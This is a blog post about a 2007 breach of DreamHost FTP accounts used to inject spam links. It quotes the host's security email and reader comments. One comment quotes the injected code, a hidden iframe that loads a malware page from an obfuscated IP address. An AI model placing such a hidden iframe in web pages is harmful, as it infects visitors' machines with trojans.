DreamHost FTP Accounts Hacked

Within the last 2 weeks approximately 3,500 DreamHost users have had their FTP account passwords stolen and about 20% of the affected users have had some of their files altered.

The users were notified of this security breach by DreamHost staff today:

From: DreamHost Security Team
Subject: URGENT: FTP Account Security Concerns…

Hello -

This email is regarding a potential security concern related to your
‘XXXX’ FTP account.

We have detected what appears to be the exploit of a number of
accounts belonging to DreamHost customers, and it appears that your
account was one of those affected.

We’re still working to determine how this occurred, but it appears
that a 3rd party found a way to obtain the password information
associated with approximately 3,500 separate FTP accounts and has
used that information to append data to the index files of customer
sites using automated scripts (primarily for search engine
optimization purposes).

Our records indicate that only roughly 20% of the accounts accessed -
less than 0.15% of the total accounts that we host – actually had
any changes made to them. Most accounts were untouched.

We ask that you do the following as soon as possible:

  1. Immediately change your FTP password, as well as that of any other accounts that may share the same password. We recommend the use of passwords containing 8 or more random letters and numbers. You may change your FTP password from the web panel (”Users” section, “Manage Users” sub-section).

  2. Review your hosted accounts/sites and ensure that nothing has been uploaded or changed that you did not do yourself. Many of the unauthorized logins did not result in changes at all (the intruder logged in, obtained a directory listing and quickly logged back out) but to be sure you should carefully review the full contents of your account.

Again, only about 20% of the exploited accounts showed any
modifications, and of those the only known changes have been to site
index documents (ie. ‘index.php’, ‘index.html’, etc – though we
recommend looking for other changes as well).

It appears that the same intruder also attempted to gain direct
access to our internal customer information database, but this was
thwarted by protections we have in place to prevent such access.
Similarly, we have seen no indication that the intruder accessed
other customer account services such as email or MySQL databases.

In the last 24 hours we have made numerous significant behind-the-
scenes changes to improve internal security, including the discovery
and patching to prevent a handful of possible exploits.

We will, of course, continue to investigate the source of this
particular security breach and keep customers apprised of what we
find. Once we learn more, we will be sure to post updates as they
become available to our status weblog:

http://www.dreamhoststatus.com/

Thank you for your patience. If you have any questions or concerns,
please let us know.

Evidence suggests that the attack has been targeted websites with a high Google PageRank and that the attacker has used his access to add a number of hidden spam links to the bottom of the affected pages in order to increase search engine rankings.

Prominent blogs like mezzoblue (PageRank 8), Crooked Timber (PageRank 7) and Caydel’s SEO Blog (PageRank 6) has been affected.

DreamHost haven’t made public yet how the attacker had gained access to the server, but some users think that the upgrade of WebFTP this afternoon might be related.

Hattip: Jeffrey R.

Updated 16:08: DreamHost has just posted about the security breach at the DreamHost Status Blog.

Updated Thursday 18:49: More info on the status blog. Other web hosts has been attacked as well. Affected users who have not yet changed their passwords will be forced to do so before they will be able to upload anything again.

Updated Friday 17:12: It’s now possible to disallow FTP logins to force users to use SSH and/or SFTP.

Updated Monday 15:17: New blog post about the Web Hosting Break-Ins at the Status Blog.

12 Responses to “DreamHost FTP Accounts Hacked”

  1. Caydel says:

    Hello, and thanks for the link.

    I would like to quickly challenge your assumption that “Evidence suggests that the attack has been targeted websites with a high Google PageRank”

    Homepages such as http://vanderveenfamily.net/ (PR 2), http://www.allaboutdolphins.net/ (PR 2), among other low-PR pages were hacked, along with several ‘in-development’ sites running on unpublished subdomains.

    I think the spammer just randomly searched for index.* files, and worked from there.

    Thanks again,

    Brian (Caydel)

  2. Kevin Fox says:

    I can’t speak as to the average, but my PR 7 site was one of those hacked.

  3. Mike says:

    Just a quick note:

    approximately 3,500 DreamHost users have had their FTP account passwords stolen

    To avoid confusion with the DH wording:

    approximately 3,500 separate FTP accounts

    Keep in mind that an L4 account can have up to 775 FTP users and even the L1 plan can have up to 75. I think many people are taking the 3,500 number as the number of customers affected.

    Just something to consider, especially since a lot of people resell on DH and could be running 1 domain per FTP user. Then add in those that create users for friends, family members, etc… or even just different users for their own domains.

    Personally, I’m more disturbed by them having panel access, than I am by the FTP stats… but that’s just me. ;-)

  4. Will says:

    They’ve also removed the password from being shown when you click on a user. However, the one for the mysql user is still shown.

  5. danielsemper says:

    I suffered form 2 different changes.

    1.- The spam links
    2.- An IFRAME code that goes to a web page with trojans and viruses that made my friends reinstall Windows. You have a Black screen after you open the page with IE6 and thats it.

    The code inserted in my index.html and index.php files was this one:

    IFRAME src='http://0xcb.0xdf.0x9e.0x0c/t' width='6' height='6' style='visibility: hidden;'>

    So this action is not for PR, is just evil.

  6. Daniel says:

    It would be nice if we had a list of the hacked server names…

  7. Tim says:

    Looks like DreamHost upgraded the WebFTP (which is located with the panel for your domain).

  8. fuck dreamhost says:

    they also manually close your ftp and http without warning!!!

  9. Unofficial DreamHost Blog says:

    fuck dreamhost – If your password has been compromised I think it is very responsible to close access to your FTP account. It was always warned about on the status blog:

    We are now forcing all of the affected users who have not yet changed their passwords to do so before they will be able to upload anything again. This is necessary so we can continue to monitor the situation and see clearly what’s going on.

  10. Linked from: DreamHost Newsletter - July 2007
  11. Neuville says:

    Hello There,
    I’m not with dreamhost, but my website was hacked exactly the same way.i’m hosted at Aruba, an italian provider, and running wordpress.

    The hacks happen since I upgrade to wp 2.2.1

    Any idea on how to solve? I’ve deleted the hack lines on the index.php yesterday night, but this morning they were there again. I’ve already asked to change my ftp password and waiting a response from the people at Aruba

  12. Linked from: 3500 DreamHost Müşterisinin Şifreleri Çalındı!